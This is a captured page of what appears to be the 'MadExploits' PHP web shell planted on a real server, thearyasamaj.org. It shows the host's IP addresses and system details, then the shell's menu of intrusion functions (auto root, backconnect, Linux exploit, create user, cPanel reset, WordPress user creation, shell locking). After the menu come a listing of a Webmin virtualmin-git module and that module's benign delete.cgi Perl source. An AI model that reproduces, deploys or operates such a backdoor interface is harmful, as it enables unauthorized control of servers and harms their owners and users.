Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.28
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
virtualmin-git /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
CHANGELOG
106
B
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
add.cgi
1.96
KB
-rwxr-xr-x
config
8
B
-rw-r--r--
config.info
117
B
-rw-r--r--
config.info.nl
133
B
-rw-r--r--
delete.cgi
1.18
KB
-rwxr-xr-x
git-favicon.png
164
B
-rw-r--r--
git-logo.png
208
B
-rw-r--r--
gitweb.cgi.source
164.73
KB
-rwxr-xr-x
gitweb.cgi.source.new
77.04
KB
-rw-r--r--
gitweb.css
3.57
KB
-rw-r--r--
help.cgi
1.82
KB
-rw-r--r--
index.cgi
4.02
KB
-rwxr-xr-x
install-type
4
B
-rw-r--r--
log_parser.pl
505
B
-rwxr-xr-x
module.info
155
B
-rw-r--r--
module.info.nl
38
B
-rw-r--r--
postinstall.pl
242
B
-rwxr-xr-x
virtual_feature.pl
23.52
KB
-rwxr-xr-x
virtualmin-git-lib.pl
9.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : delete.cgi
#!/usr/bin/perl # Delete one Git repository use strict; use warnings; our (%text, %in); require './virtualmin-git-lib.pl'; &ReadParse(); # Get the domain and repository my $repdom = $in{'rep'}; my ($repname, $id) = split(/\@/, $repdom); my $dom = &virtual_server::get_domain($id); &can_edit_domain($dom) || &error($text{'add_edom'}); my @reps = &list_reps($dom); my ($rep) = grep { $_->{'rep'} eq $repname } @reps; $rep || &error($text{'delete_erep'}); if ($in{'confirm'}) { # Do it! &delete_rep($dom, $rep); &webmin_log("delete", "repo", $repname, { 'dom' => $dom->{'dom'} }); &redirect("index.cgi?show=$in{'show'}"); } else { # Ask first &ui_print_header(&virtual_server::domain_in($dom), $text{'delete_title'}, ""); print "<center>\n"; my $size = &disk_usage_kb($rep->{'dir'}); print &ui_form_start("delete.cgi"); print &ui_hidden("rep", $repdom); print &ui_hidden("action", "delete"); print &ui_hidden("show", $in{'show'}); print &text('delete_rusure', "<tt>$repname</tt>", &nice_size($size*1024)),"<p>\n"; print &ui_form_end([ [ "confirm", $text{'delete_ok'} ] ]); print "</center>\n"; &ui_print_footer("index.cgi?show=$in{'show'}", $text{'index_return'}); }
Close